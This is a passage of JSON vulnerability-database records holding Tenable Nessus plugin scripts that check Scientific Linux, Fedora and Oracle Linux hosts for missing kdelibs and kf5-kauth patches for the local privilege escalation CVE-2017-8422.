script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kdelibs-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kdelibs-apidocs-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kdelibs-common-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kdelibs-debuginfo-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kdelibs-devel-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kdelibs-ktexteditor-4.14.8-6.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-common / kdelibs-debuginfo / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:04", "description": "security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "type": "nessus", "title": "Fedora 24 : kf5-kauth (2017-6bdbf57f29)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kf5-kauth", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-6BDBF57F29.NASL", "href": "https://www.tenable.com/plugins/nessus/100191", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-6bdbf57f29.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100191);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"FEDORA\", value:\"2017-6bdbf57f29\");\n\n script_name(english:\"Fedora 24 : kf5-kauth (2017-6bdbf57f29)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-6bdbf57f29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kf5-kauth package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kf5-kauth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kf5-kauth-5.33.0-2.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kf5-kauth\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:51", "description": "security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "type": "nessus", "title": "Fedora 25 : kf5-kauth (2017-7e3437b905)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kf5-kauth", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-7E3437B905.NASL", "href": "https://www.tenable.com/plugins/nessus/100193", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7e3437b905.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100193);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"FEDORA\", value:\"2017-7e3437b905\");\n\n script_name(english:\"Fedora 25 : kf5-kauth (2017-7e3437b905)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7e3437b905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kf5-kauth package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kf5-kauth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kf5-kauth-5.33.0-2.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kf5-kauth\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:21", "description": "security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : 6:kdelibs (2017-dd51077c87)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:6:kdelibs", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-DD51077C87.NASL", "href": "https://www.tenable.com/plugins/nessus/101735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-dd51077c87.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101735);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"FEDORA\", value:\"2017-dd51077c87\");\n\n script_name(english:\"Fedora 26 : 6:kdelibs (2017-dd51077c87)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-dd51077c87\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 6:kdelibs package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:6:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kdelibs-4.14.30-2.fc26\", epoch:\"6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"6:kdelibs\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:25", "description": "security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : kf5-kauth (2017-0898c704a1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kf5-kauth", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-0898C704A1.NASL", "href": "https://www.tenable.com/plugins/nessus/101567", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0898c704a1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101567);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"FEDORA\", value:\"2017-0898c704a1\");\n\n script_name(english:\"Fedora 26 : kf5-kauth (2017-0898c704a1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0898c704a1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kf5-kauth package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kf5-kauth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kf5-kauth-5.33.0-2.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kf5-kauth\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:41", "description": "From Red Hat Security Advisory 2017:1264 :\n\nAn update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this issue.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : kdelibs (ELSA-2017-1264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kdelibs", "p-cpe:/a:oracle:linux:kdelibs-apidocs", "p-cpe:/a:oracle:linux:kdelibs-common", "p-cpe:/a:oracle:linux:kdelibs-devel", "p-cpe:/a:oracle:linux:kdelibs-ktexteditor", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/100343", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:1264 and \n# Oracle Linux Security Advisory ELSA-2017-1264 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100343);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"RHSA\", value:\"2017:1264\");\n\n script_name(english:\"Oracle Linux 7 : kdelibs (ELSA-2017-1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:1264 :\n\nAn update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for\nthe X Window System. The kdelibs packages include core libraries for\nthe K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled\nD-Bus messages. A local user could potentially use this flaw to gain\nroot privileges by spoofing a callerID and leveraging a privileged\nhelper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006920.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs-ktexteditor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 